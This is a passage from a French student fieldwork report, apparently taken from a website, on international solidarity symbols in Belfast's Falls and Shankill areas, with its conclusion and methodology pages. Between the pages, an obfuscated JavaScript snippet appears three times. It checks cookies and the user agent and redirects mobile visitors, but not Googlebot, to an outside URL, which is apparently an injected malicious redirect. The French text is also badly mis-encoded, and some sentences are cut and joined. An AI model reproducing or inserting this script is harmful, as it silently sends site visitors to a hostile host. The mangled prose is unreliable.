A�Notons toutefois que c’est le seul magasin visible qui serve de soutien A�conomique concret. A priori, on pourrait en dA�duire que ces autres boutiques ont avant tout une fonction touristique, commerciale, et par consA�quent, cela laisse penser que les initiatives de soutien matA�riel A� d’autres causes restent rares. En revanche, la prA�sence de tous ces magasins participe A� un message politique en faveur de la cause rA�publicaine et d’autres causes internationales par la symbolique des produits qu’ils vendent. Certains articles tels que des t-shirts affichent des messages trA?s explicites tels que A�A�free PalestineA�A�. Par ailleurs, dans trois magasins visitA�s sur quatre, rA�publicains ou loyalistes distribuent ou vendent des journaux de propagande. Les journaux de propagandes semblent avoir pour rA?le de maintenir les tensions entre loyalistes et rA�publicains, bien que le conflit armA� ait pris fin. Toutefois, en dehors du journal A�A�Aqsa NewsA�A� (cela fait rA�fA�rence A� la mosquA�e Al Aqsa situA�e sur le Mont du Temple ou Esplanade des MosquA�es dans la vieille ville de JA�rusalem) distribuA� chez CeiliA?r an Choilm (magasin dA�diA� aux produits palestiniens), aucun d’entre eux ne met l’accent sur les questions internationales. La plupart des articles ont plutA?t tendance A� se tourner vers des A�vA�nements passA�s. En somme, les magasins semblent donc jouer un rA?le important dans la diffusion du message politique des rA�publicains irlandais.

Les magasins diffusant un message politique sont tenus par des personnes gA�nA�ralement engagA�es, ou du moins intA�ressA�es de prA?s A� la politique. Dans deux cas sur trois les personnes prA�sentes dans ces magasins rA�publicains expriment une trA?s forte solidaritA�, notamment envers la cause palestinienne mais aussi la cause basque. Tous considA?rent le peuple irlandais oppressA� au mA?me titre que le peuple palestinien et mentionnent leur volontA� commune d’indA�pendance A� l’A�gard d’un A�tat colonisateur. Ils estiment la cause rA�publicaine trA?s proche de celle des Palestiniens et des Basques. L’un d’entre eux dA�clare d’ailleurs s’A?tre rendu au Pays Basque et souhaite trA?s fortement se rendre en Palestine.

A cA?tA� de la solidaritA� envers la Palestine donc, le Pays Basque est souvent mentionnA� par les acteurs interrogA�s. Nous pouvons supposer que, si les rA�fA�rences A� l’indA�pendantisme basque sont moins visibles actuellement, cela est probablement dA� au fait que le conflit avec l’Espagne se soit progressivement pacifiA�, alors que la question palestinienne n’est toujours pas rA�solue. Nous trouvons toutefois un mural dA�diA� aux Basques, et en particulier a�� ici encore a�� aux prisonniers politiquesA�:

Free Otegi, Falls Road, Lucien Rappaz, le 01.03.2016
Free Otegi, Falls Road, Lucien Rappaz, le 01.03.2016

 

Ce mural est trA?s spA�cifique car il reprA�sente Arnaldo Otegi, un militant basque emprisonnA� pour des motifs politiques tels que mentionnA�s sur le mural.1 Pour savoir qui est Otegi, il faut avoir une certaine connaissance des A�vA�nements se dA�roulant au Pays Basque, ce qui explique que l’auteur du mural ait accompagnA� l’image d’un texte, afin que des personnes lambda passant devant puissent savoir de qui il s’agit. Sur le mural on reconnaA�t les couleurs basques sur fond noir. La moitiA� da��Otegi est peinte dans ces couleurs, soulignant son origine et son implication pour le Pays Basque. Le poing tendu, il est prA�sentA� comme une figure rA�volutionnaire. Avec un micro devant lui, il est souriant ce qui est plutA?t significatif d’espoir. En somme, on comprend qu’il s’agit d’une personne qui s’investit pour la cause basque et joue un rA?le important pour celle-ci. Un texte accompagne la peinture, quelques mots en basque : A�A�Pake bideanA�A� qui signifie A�A�sur la route de la paixA�A� tel qu’inscrit en anglais A� cA?tA�, le plus gros du message est d’ailleurs dans cette langue, ainsi qu’une phrase en irlandais pour la libA�ration des prisonniers politiques tout en bas. Il y a une rA�pA�tition du mot A� free A�, et donc une insistance sur la libertA�. Comme pour le mural palestinien, les prisonniers politiques basques sont considA�rA�s comme oppressA�s, et on dA�nonce leur emprisonnement. Pour marquer une atteinte A� la libertA� politique, on mentionne un chiffre, celui des 700 prisonniers basques, en France comme en Espagne, dont Otegi est la figure, mais derriA?re lui, il y en a beaucoup da��autres. Cela rappelle que beaucoup da��Irlandais ont eux aussi A�tA� emprisonnA�s. Encore une fois, il y a une mise en avant des similitudes entre la cause rA�publicaine et d’autres, ici la cause basque. Cela peut A�galement rappeler A� la mA�moire des Irlandais, Bobby Sand, qui A�tait un prisonnier politique irlandais et qui est dA�cA�dA� en prison lors da��une grA?ve de la faim.

Comme dit prA�cA�demment, la connaissance d’Otegi demande un intA�rA?t particulier pour la cause basque. MalgrA� le texte accompagnant le mural vu prA�cA�demment, le passant lambda de Falls Road ne semble pas savoir vraiment de qui il s’agit, contrairement A� des personnes plus impliquA�es politiquement, selon diffA�rentes interviews. Cela est probablement le signe que, si solidaritA� il y a entre les rA�publicains irlandais et d’autres luttes au niveau international, celle-ci est surtout maintenue par des personnes qui ont un intA�rA?t important pour la politique et qui sont engagA�es. Un modeste rassemblement de 30 A� 40 personnes a eu lieu A� Belfast le 1er mars 2016, soit le jour de la sortie de prison d’Otegi. Cela dA�montre qu’une implication concrA?te de la communautA� irlandaise pour les luttes au niveau internationale ne peut pas A?tre gA�nA�ralisA�e.

Selon Pascal PragnA?re (2014), les liens entre Basques et Irlandais sont rA�els et sont nA�s de leur cause commune pour l’indA�pendance vis-A�-vis d’un pays tiers (Espagne et Royaume Uni) et qui a eu lieu dans une pA�riode de temps similaire. Au niveau politique, Sinn FA�in (parti rA�publicain) a commencA� A� prendre contact avec les Basques d’Herri Batasuna (parti indA�pendantiste) dans les annA�es 70, de mA?me qu’avec des organisations pro-palestiniennes et anti-apartheid en Afrique du Sud. Toujours selon le mA?me auteur, dA?s lors Basques et Irlandais se sont rA�guliA?rement consultA�s, rencontrA�s, soutenus, et ont partagA�s leurs expA�riences, notamment dans le but d’amA�liorer leur lutte. Cette proximitA� politique s’est diffusA�e par la suite dans d’autres domaines, tels que l’art et le tourismeA�; des A�changes sur lesquels nous reviendrons ultA�rieurement.

Si les liens politiques semblent avA�rA�s, en visitant le site internet officiel du principal parti rA�publicain d’Irlande du Nord, le Sinn FA�in, nous ne trouvons pourtant pas la moindre allusion A� des partis A�A�frA?resA�A� dans d’autres pays, ni aucune nouvelle du dA�roulement da��A�vA�nements dans certaines parties du monde, telle que la Palestine. Les diffA�rentes rubriques se concentrent sur l’actualitA� politique en Irlande du Nord. Soit malgrA� le fait que deux magasins touristiques portent le nom du parti, que l’un d’entre eux, vendant des articles en rA�fA�rences A� d’autres conflits promeuve le site de Sinn FA�in, le lien avec da��autres causes n’est pas affichA�. Est-ce dA� A� un affaiblissement de relations internationalesA�de Sinn FA�in ? Ou a une volontA� de ce parti de se concentrer avant tout sur les politiques Nord-IrlandaisesA�?

A Belfast, l’Irish Republican History Museum, toujours dans le quartier de Falls, a pour but d’informer, notamment la jeunesse, sur l’histoire de la lutte irlandaise pour la libertA�. Il est donc centrA� sur la question des conflits ayant eu lieu avec le Royaume Uni. Pourtant, on y trouve exposA� en premier plan, de maniA?re donc valorisA�e, un prA�sentoir contenant des pins et autres petits objets symboliques oA? sont reprA�sentA�s, au milieu de symboles irlandais et rA�publicains, drapeaux basques, catalans, de la rA�publique espagnole et de brigades enrA?lA�es dans la guerre civile espagnole. (A la��A�poque, de nombreux Irlandais s’A�taient par ailleurs rendus en Espagne pour rejoindre les brigades internationales, et l’Irlande du Nord avait accueilli des rA�fugiA�s espagnols qui sont restA�s par la suite. Soit l’engagement d’Irlandais pour des causes internationales n’est pas rA�cent). On peut interprA�ter la cohabitation de ces diffA�rents symboles dans un mA?me prA�sentoir comme la volontA� de prA�senter ces combats comme similaires. La raison de cette prA�sence s’explique par la mise en place d’un tourisme politique en Irlande du NordA�: ces pins sont des donations laissA�es lA� par les visiteurs, qui comme on le voit, proviennent en particulier des zones indA�pendantistes de l’Espagne. Selon Pascal PragnA?re (2014), il est mA?me possible de suivre des tours politiques en langue basque, ce qui montre donc que ces deux rA�gions du monde ont tissA�s des liens, qui on peut le supposer ici, ont des buts d’A�changes politiques, culturels et A�conomiques. L’auteur montre que les A�changes artistiques et culturels entre Irlandais et Basques se manifestent A�galement A� travers des A�changes d’artistes, crA�ant parfois des murals les uns chez les autres. Dans les deux rA�gions, des organisations de jeunesse ont mis en place des visites dans le pays frA?re, ce qui A�tait souvent la��occasion de peindre de nouveaux murals. Si aujourda��hui la��Irlande du Nord est en processus de paix et si la violence a pris fin au Pays Basque, les liens demeurent et seraient mA?me devenus personnels et familiaux dans certains cas.

Absence de solidaritA� chez les loyalistes. Pourquoi cette diffA�rence ?

Suite A� ces observations, nous sommes en mesure de poser quelques hypothA?ses qui pourraient expliquer cette disparitA� aujourda��hui. La plus aboutie repose sur le contexte historique de la��Irlande du Nord ainsi que de la place dans la��environnement social de chacun des deux groupes. Explorer cette piste nous semble A?tre un bon dA�part dans la comprA�hension de la��asymA�trie que nous avons constatA�. Nous commencerons da��abord par dA�crire le cas loyaliste, puis ensuite le cas rA�publicain.

Le point de vue des loyalistes sur les conflits internationaux est assez simpleA�da��aprA?s nos observations : leur intA�rA?t est relativement faible, les symboles existants ont souvent une signification faible A�galement. A la��exception du Mural IsraA�lien proche de la��International Wall mais de la��autre cA?tA� de la peace line, qui est un hommage aux britanniques par IsraA�l.

Ces A�lA�ments remis dans le cadre du conflit, nous voyons que les loyalistes ont dA� faire face A� une demande da��indA�pendance da��une rA�gion qua��ils considA�raient comme A�tant la leur, et ont ainsi eu besoin de rA�affirmer leur identitA� en tant que citoyens britanniques (Rolston, 1992).A� On trouve dans cette explication A�galement la raison de la plus grande violence des images diffusA�es par les loyalistesA�: les messages de ceux-ci A�tant en accord avec la��ure A�tait quasiment inexistante (Lisle, 2006).

A la��inverse, les rA�publicains, de par leurs intentions sA�cessionnistes, ne pouvaient pas bA�nA�ficier du soutien de la��t donc dA� se rattacher A� des idA�aux transA�tatiques. Le premier thA?me abordA� par les rA�publicains fut donc le socialisme, et particuliA?rement le rattachement au mouvement muraliste mexicain (Lisle, 2006). En partant de cette base, on comprend vite la logique derriA?re la forte internationalisation des murals rA�publicainesA�: il sa��agit de lA�gitimer sa cause en se revendiquant comme peuple oppressA� par les structures politiques en place. Il est A�galement naturel de penser que ce mouvement impactant la��espace public a largement influencA� la perception que les nord-irlandais catholiques ont da��eux-mA?mes et surtout de comment ils se situent par rapport aux autres peuples victimes da��oppression, expliquant ainsi le nombre A�levA� de symboles faisant rA�fA�rence A� la��international dans les divers magasins analysA�s.
Pour rA�sumer, il existe une vraie rA�sonance internationale dans la cause rA�publicaine qui na��existe simplement pas dans la cause loyaliste, cette derniA?re A�tant plus isolA�e (Lisle, 2006). La cause des diffA�rences da��intensitA� dont nous avons A�tA� tA�moins nous semble A?tre donc A� chercher dans les origines de chaque mouvement, mais surtout dans leur volontA� et dans quelle mesure celle-ci rentrait en conflit avec la��autoritA� en place sur le moment.

Retourner A� la page « SolidaritA� Internationale »

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Conclusion – SolidaritA� Internationale

Conclusion

 

Notre recherche nous a amenA� A� constater que la solidaritA� internationale A�tait asymA�trique entre les rA�publicains et les loyalistes. En effet, nous avons pu observer une bien plus grande solidaritA� et importance accordA�e A� da��autres conflits chez les rA�publicains (autant A� travers les murals qua��aux travers des divers magasins politiquement orientA�s que nous avons visitA�) que chez les loyalistes, oA? les symboles que nous avons analysA�s sont trA?s peu ouverts sur da��autres causes A� la��A�tranger et beaucoup plus centrA�s sur eux-mA?mes.

Malheureusement, nous na��avons pas pu remonter la��A�chelle de production et de distribution des produits vendus dans les magasins, par manque de temps et de rA�ponses. On pourrait aussi approfondir le terrain de recherche dans da��autres quartiers de Belfast et dans diffA�rentes villes du nord de la��Irlande, comme Derry/Londonderry. Il serait pertinent de creuser ces points-lA� dans des recherches futures. Un autre point intA�ressant A� creuser serait la question de la rA�ciprocitA�A�: en effet, savoir A� quel point da��autres pays ou rA�gions sont au courant de cette solidaritA� et sa��ils partagent ce sentiment de cause commune. De voir aussi sa��ils mettent en avant des symboles de solidaritA� dans la��espace public et si oui, sous quelle forme.

Finalement, nous conclurons ce travail par un retour sur notre expA�rience personnelle. Ce fut pour nous une premiA?re expA�rience de recherche sur un terrain. Cela nous a beaucoup apportA� de faire notre travail de A A� Z, en nous renseignant, choisissant notre sujet, rA�flA�chissant A� notre mA�thodologie, faisant nos premiA?res expA�riences et erreurs de terrain. Ce fA�t une chance de dA�couvrir un sujet non pas que par des livres et des cours, mais par le vA�cu, la��expA�rience, ainsi qua��une imprA�gnation directe avec le sujet. Et, malgrA� toutes nos difficultA�s, cela restera une expA�rience mA�morable.

Retourner A� la page « SolidaritA� Internationale »

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

MA�thodologie – SolidaritA� Internationale

MA�thodologie plurielle

 

Pour notre travail de terrain A� Belfast, nous avons croisA� plusieurs mA�thodes de recherche. En tenant compte du peu de temps de recherche A� notre disposition, ca��est-A�-dire deux demi-journA�es, nous avons utilisA� plutA?t des mA�thodes qualitatives et non quantitatives car nous na��avions pas le temps et les moyens da��avoir les sources nA�cessaires pour faire des analyses statistiques et mathA�matiques.

Nous avons utilisA� diverses mA�thodes qualitativesA�: observation, entretien semi-directif, gA�olocalisation et analyse da��image.

PremiA?rement, la��observation diffuse de la��espace public est notre mA�thode principale, elle nous permet da��identifier des symboles ou icA?nes liA�s A� la reprA�sentation da��autres conflits ou luttes hors da��Irlande du Nord et ainsi de voir dans quelle mesure le conflit nord-irlandais est internationalisA� A� travers ces rA�fA�rences et sa��inscrit dans une solidaritA� avec da��autre groupes A� la��A�tranger. Plus prA�cisA�ment, nous nous sommes appuyA�s sur les murals loyalistes et un mural rA�publicain, sur les drapeaux et affiches, ainsi que sur les boutiques vendant des articles A� caractA?re international (drapeaux, livres, a��). Notre terrain sa��est surtout limitA� au quartier de Falls, A� tendance rA�publicaine et au quartier de Shankill, plutA?t loyaliste. Ce sont des quartiers plutA?t populaires, situA� dans la��espace pA�ricentral, oA? les traces de la sA�paration, et la sA�paration elle-mA?me demeure. Nous avons gA�o-localisA� et photographiA� chacune de nos sources da��observation. De plus, dans les magasins oA? nous sommes allA�s, nous avons relevA�, via un inventaire, chaque objet liA� A� la��international et si possible son lieu de fabrication. Puis, en partant de ce que la��on a trouvA� sur place en lien avec da��autres conflits, nous avons analysA� les symboles qui se rattachent A� une mA�moire collective de rA�voltes, conflits, pour A� la fin tenter de rA�pondre A� notre problA�matique.

DeuxiA?mement, nous avons effectuA� des entretiens. Tout au long de notre semaine sur place, les divers intervenants, notamment les chauffeurs de Black Cabs, nous ont permis de mieux comprendre le contexte de la��Irlande du Nord et ses diffA�rentes facettes. Ainsi, nous avons pu avoir une idA�e gA�nA�rale et cela nous a donnA� des pistes concernant notre question de recherche. Ca��A�tait des questions plutA?t A� dA�couvert car les divers intervenants connaissaient notre statut da��A�tudiant en voyage da��A�tude. Ensuite, nous avons utilisA� des entretiens, qui prenaient la forme de discussion, agrA�mentA�es de nos questions, pour mettre en lien ce que nous avions observA� dans la��espace public et les pratiques des acteurs. PremiA?rement, nous avons questionnA� les personnes qui tenaient les magasins oA? il y avait des conflits internationaux reprA�sentA�s, pour essayer de comprendre le type de solidaritA� qua��ils se reprA�sentent, ceci A� travers leurs connaissances du sujet, leur implication, la��origine de leurs produits, etc. Ces entretiens se sont dA�roulA�s A� couvert. Afin de ne pas paraA�tre trop intrusifs, nous avons prA�fA�rA� utiliser la prise de note et non l’enregistrement. Nous voulions aussi interroger les personnes frA�quentant les magasins, mais malheureusement, il na��y avait personne au moment de notre terrain. DeuxiA?mement, nous avons effectuA� des micros-trottoirs devant les murals, ou devant les drapeaux qui A�taient en lien avec notre sujet. Nous avons ainsi rA�coltA� A� chaud les rA�ponses des habitants de ces lieux. Cela nous a permis de voir leur connaissance du sujet, ou leur explication de tel ou tel autre symbole.

Tenant compte de la��A�ventuelle publication en ligne de nos rA�sultats, nous faisons tout particuliA?rement attention au respect de la��anonymat de nos interviewA�s. Mais nous profitons aussi de ce support pour crA�er un rendu diffA�rent du support papier dont nous avons la��habitude, en intA�grant par exemple, une carte interactive reprA�sentant notre terrain de recherche.

Critique mA�thodologique

Ce retour critique sur notre mA�thodologie ne sera pas sA�parA� entre points positifs et nA�gatifs, mais sera prA�sentA� de maniA?re A� essayer de montrer la��A�volution des mA�thodes utilisA�es, nos rA�flexions autour de celles-ci et leurs limites.

Pour notre premiA?re demi-journA�e de terrain, nous na��A�tions probablement pas assez prA�parA�s, nous na��avions pas une dA�marche claire, une liste de choses A� relever ni des questions prA�cises. En effet, si nous comptions faire des interviews, nous n’avions pas prA�vu d’interroger des personnes travaillant dans des magasins. Pour rA�sultat, nous nous sommes A�cartA�s de nos objectifs lors de notre premier entretien dans un magasin rA�publicain. Ce que nous avons appris A�tait intA�ressant mais cela sa��A�loignait de notre recherche et nous avons passA� trop de temps sur une source qui na��A�tait pas forcA�ment reprA�sentative de la majoritA�. En effet, les personnes interrogA�es dans ce magasin avaient des opinions trA?s tranchA�es et A�taient partisannes d’un mouvement politique extrA�miste. Par consA�quent, faisant face A� des personnes ayant de fortes personnalitA�s, notre manque de prA�paration nous a amenA� A� discuter de thA?mes hors-sujet.

A�Cependant cette expA�rience nous a permis de faire A�voluer notre recherche. En effet, avant de partir, notre idA�e A�tait de rechercher des symboles forts autour des murals, mais cela na��a pas A�tA� trA?s concluant sur notre terrain et un autre groupe da��A�tudiant utilisait quasiment les mA?mes sources de donnA�es. Cependant, notre rencontre avec les gA�rants de ce magasin nous a ouvert la piste de ne pas seulement nous intA�resser aux murals mais A� toutes autres reprA�sentations dans la��espace public, notamment les magasins (leur faA�ade, la��inventaire, la provenance des articles, les fascicules et journaux mis A� disposition, ainsi que la��arrangement des articles du magasin). Cela nous a amenA� A� changer da��A�chantillon da��analyse, ainsi qua��A� rajouter la��analyse de la faA�ade et de la��intA�rieur des magasins dans notre recherche. Nous avions aussi prA�vu de mettre en commun, avec da��autres groupes, nos travaux pour qua��on puisse interroger un peintre de murals, mais dA� A� ce changement da��angle, cela est devenu moins pertinent. Nous pouvons donc voir une nette A�volution de notre terrain et mA�thode entre nos deux demi-journA�es qui se caractA�risent par une refocalisation sur les magasins et par une prA�paration beaucoup plus claire

Avant de partir, nous imaginions pouvoir interviewer chaque intervenant, mais cela na��a pas A�tA� possible concrA?tement par manque de temps et da��organisation. De plus, les questions de notre grille A�taient trop larges. Nous na��avons pas pu faire une vraie analyse de discours avec les entretiens effectuA�s A� partir de notre grille de questions revisitA�e. En effet, nous na��avons pas pu enregistrer ou retranscrire en temps rA�el les rA�ponses.

La limite principale de notre travail est le peu de temps que nous avions A� disposition. Nous aurions voulu pouvoir passer plus de temps en dehors des quartiers de Falls et Shankill (notamment East Belfast qui a des murals un peu diffA�rents ou encore dans les quartiers dits plus A�A�neutreA�A�). Le fait d’avoir d’avoir enquA?tA� dans les quartiers les plus nationalistes et loyalistes peuvent constituer un biais dans notre travail, car on y trouve des discours (A� travers les symboles ou les interviews) politiques trA?s orientA�s, pas forcA�ment reprA�sentatifs de la situation politique globale.

Retourner A� la page « SolidaritA� Internationale »

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 